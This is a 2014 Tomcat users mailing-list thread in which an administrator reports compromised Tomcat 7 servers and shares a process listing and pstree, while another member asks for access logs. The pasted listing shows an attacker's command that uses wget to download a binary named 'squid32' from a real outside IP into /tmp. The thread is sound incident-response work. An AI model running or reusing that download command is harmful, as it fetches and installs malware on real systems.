Hello Dan, Nop, the attacker is executing locally the following
tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh tomcat 8893 8882 0 Apr27 ? 00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid And the launch squid who tries to connect via ssh to varoius places. Right now its time to leave the office, but in a few hours i will paste in pastebin access logs, config files, wherever you tell me. This is my pstree [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd ├─atop ├─crond ├─dbus-daemon ├─events/0 ├─events/1 ├─events/2 ├─events/3 ├─httpd───8*[httpd] ├─irqbalance ├─2*[iscsid] ├─iscsiuio───3*[{iscsiuio}] ├─java─┬─sh───wget │ └─263*[{java}] ├─khelper By the way, logfiles are really big, 200 mb each one, ill try to set up a dropbox account so i can share it. Thanks and regards Saludos.- Leonardo Santagostini <http://ar.linkedin.com/in/santagostini> 2014-04-29 17:34 GMT-03:00 Daniel Mikusa <dmik...@gopivotal.com>: > On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini < > lsantagost...@gmail.com> wrote: > > > Hello list, > > > > Im facing an issue in 6 tomcat server that are getting penetrated and > they > > are executing malicious scripts on my server. > > Can you share more about what they are doing? It might give some clues as > to how they are accessing your machines. For example, if they are > deploying a WAR file to your server, it could mean that they have access to > the Manager application on your server. > > Any details you can share, might be helpful. > > > Im using 7.0.53 on my servers. Running Centos 5.8 > > > > Let me know what information you need. > > Do you have an access log? If not, enable one. If the attacker is not > deleting it, it could show you more about who they are and what requests > they are executing to access your server. Assuming they are entering > through your application and not some other way. > > Dan > > > > > PS: This is my first mail to this list, so i apologize for this not > gentle > > presentation. > > > > Saludos.- > > Leonardo Santagostini > > > > <http://ar.linkedin.com/in/santagostini> > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org > For additional commands, e-mail: users-h...@tomcat.apache.org > >